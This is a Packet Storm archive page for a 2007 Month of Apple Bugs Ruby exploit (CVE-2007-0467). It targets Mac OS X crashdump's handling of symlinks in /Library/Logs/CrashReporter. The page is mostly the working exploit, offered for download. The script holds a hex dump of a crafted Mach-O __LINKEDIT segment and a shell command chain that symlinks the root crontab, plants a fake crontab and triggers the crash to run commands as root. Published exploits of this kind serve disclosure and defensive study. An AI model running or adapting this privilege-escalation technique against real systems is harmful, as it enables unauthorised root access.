exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

MOAB-28-01-2007.rb.txt

MOAB-28-01-2007.rb.txt
Posted Jan 29, 2007
Authored by Kevin Finisterre, LMH | Site projects.info-pull.com

Month of Apple Bugs - crashdump follows symlinks within the /Library/Logs/CrashReporter/ directory, allowing admin-group users to execute arbitrary code and overwrite files with elevated privileges. In couple with a specially crafted Mach-O binary, this can be used to write a malicious crontab entry, which will run with root privileges. This ruby code demonstrates this vulnerability.

tags | exploit, arbitrary, root, ruby
systems | apple
advisories | CVE-2007-0467
SHA-256 | a2f484f050a3539545bc04527aebfb7718411d5e564498448fa7024d15700ebe

MOAB-28-01-2007.rb.txt

Change Mirror Download
#!/usr/bin/ruby
# Copyright (c) 2007 Kevin Finisterre <kf_lists [at] digitalmunition.com>
# Lance M. Havok <lmh [at] info-pull.com>
# All pwnage reserved.
#
# 1) Stop crashdump from writing to ~/Library/Logs via chmod 000 ~/Library/Logs/CrashReporter
# 2) Make symlink to /Library/Logs/CrashReporter/knownprog.crash.log
# 3) Create a program with a modified __LINKEDIT segment that influences crashreporter output
#
# 0000320: 3800 0000 5f5f 4c49 4e4b 4544 4954 0000 8...__LINKEDIT..
# 0000330: 0000 0000 0040 0000 0010 0000 0030 0000 .....@.......0..
# 0000340: 2004 0000 0300 0000 0100 0000 0000 0000 ...............
# 0000350: 0400 0000 0e00 0000 1c00 0000 0c00 0000 ................
# 0000360: 2f75 7372 2f6c 6962 2f64 796c 6400 0000 /usr/lib/dyld...
# 0000370: 0c00 0000 3400 0000 1800 0000 68b7 9b45 ....4.......h..E
# 0000380: 0403 5800 0000 0100 0d0a 2a20 2a20 2a20 ..X.......* * *
# 0000390: 2a20 2a20 2f74 6d70 2f78 0d0a 2e64 796c * * /tmp/x...dyl
# 00003a0: 6962 0000 0200 0000 1800 0000 0030 0000 ib...........0..
#
# 4) Run the fake program which will crash and create /var/cron/tabs/root
# 5) Sleep and then create a legit crontab to refresh cron

SYMLINK_PATH = "/Library/Logs/CrashReporter/vuln.crash.log"

PWNERCYCLE = "ln -s /var/cron/tabs/root #{SYMLINK_PATH};" +
"chmod 000 ~/Library/Logs/CrashReporter/;" +
"crontab /tmp/fakecron;" +
"chmod +x /Users/Shared/r00t; sleep 61; ./vuln;"

def escalate()
puts "++ Fixing up a fake crontab"
fakecron = File.new("/tmp/fakecron", "w")
fakecron.print("* * * * * /usr/bin/id > /tmp/USERCRON\n")
fakecron.close
tmp_ex = File.new("/Users/Shared/r00t", "w")
tmp_ex.print("/usr/bin/id > /tmp/CRASHREPOWNED\n")
tmp_ex.close

system PWNERCYCLE
end

escalate()

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close